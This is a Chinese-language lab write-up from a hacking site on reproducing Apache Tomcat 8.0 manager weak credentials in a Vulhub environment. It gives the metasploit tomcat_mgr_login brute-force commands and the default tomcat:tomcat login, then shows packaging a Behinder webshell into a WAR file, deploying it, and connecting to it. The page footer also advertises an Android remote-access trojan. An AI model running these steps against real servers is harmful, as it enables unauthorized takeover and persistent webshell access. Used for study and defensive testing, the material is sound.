漏洞描述
Tomcat 支持在后台部署 war 文件,可以直接将 webshell 部署到 web 目录下。其中,欲访问后台,需要对应用户有相应权限。
Tomcat7+ 权限分为:
- manager(后台管理)
- manager-gui 拥有 html 页面权限
- manager-status 拥有查看 status 的权限
- manager-script 拥有 text 接口的权限,和 status 权限
- manager-jmx 拥有 jmx 权限,和 status 权限
- host-manager(虚拟主机管理)
- admin-gui 拥有 html 页面权限
- admin-script 拥有 text 接口权限
这些权限的究竟有什么作用,详情阅读 http://tomcat.apache.org/tomcat-8.5-doc/manager-howto.html
在 conf/tomcat-users.xml 文件中配置用户的权限:
<?xml version="1.0" encoding="UTF-8"?> <tomcat-users xmlns="http://tomcat.apache.org/xml" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd" version="1.0"> <role rolename="manager-gui"/> <role rolename="manager-script"/> <role rolename="manager-jmx"/> <role rolename="manager-status"/> <role rolename="admin-gui"/> <role rolename="admin-script"/> <user username="tomcat" password="tomcat" roles="manager-gui,manager-script,manager-jmx,manager-status,admin-gui,admin-script" /> </tomcat-users>
可见,用户 tomcat 拥有上述所有权限,密码是 tomcat。
正常安装的情况下,tomcat8 中默认没有任何用户,且 manager 页面只允许本地 IP 访问。只有管理员手工修改了这些属性的情况下,才可以进行攻击。
漏洞影响
Tomcat 版本:8.0
环境搭建
Vulhub 无需编译,直接启动整个环境:
docker-compose up -d
访问 http://your-ip:8080/ 即可访问 Apache Tomcat/8.0.43 页面。
漏洞复现
metasploit 爆破 tomcat 弱口令
访问 http://your-ip:8080/,点击 Manager App:

跳转 tomcat 管理页面 http://your-ip:8080/manager/html,提示输入用户名和密码:

在 kali 中使用 metasploit 对 tomcat 用户名和密码进行爆破:
┌──(root kali)-[/home/kali] └─# msfconsole # 搜索tomcat相关模块 msf6 > search tomcat ... 23 auxiliary/scanner/http/tomcat_mgr_login normal No Tomcat Application Manager Login Utility ... # 使用tomcat_mgr_login模块进行爆破 msf6 > use auxiliary/scanner/http/tomcat_mgr_login # 设置服务地址 msf6 auxiliary(scanner/http/tomcat_mgr_login) >show options msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RHOSTS <your-ip> RHOSTS => <your-ip> msf6 auxiliary(scanner/http/tomcat_mgr_login) > run
爆破成功,用户名密码为 tomcat:tomcat:

输入弱密码 tomcat:tomcat,即可访问后台。
制作 war 包并上传
首先制作 war 包 project.war:
E:\Behinder3\server>jar -cvf project.war shell.jsp 已添加清单 正在添加: shell.jsp(输入 = 612) (输出 = 449)(压缩了 26%)
上传 war 包:

成功部署:

冰蝎 3 成功连接 http://your-ip:8080/project/shell.jsp:

© 版权声明
1、本网站名称:
X黑手网
2、本站永久网址:https://www.xheishou.com
3、本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长进行删除处理。
4、本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
5、本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6、本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
2、本站永久网址:https://www.xheishou.com
3、本网站的文章部分内容可能来源于网络,仅供大家学习与参考,如有侵权,请联系站长进行删除处理。
4、本站一切资源不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
5、本站一律禁止以任何方式发布或转载任何违法的相关信息,访客发现请向站长举报
6、本站资源大多存储在云盘,如发现链接失效,请联系我们我们会第一时间更新。
THE END










![【实战测试]全新CraxsRat安卓远控来袭,自带免杀不报毒-X黑手网](https://cdn.x10001.com/2024/11/20241109185149961.png)





暂无评论内容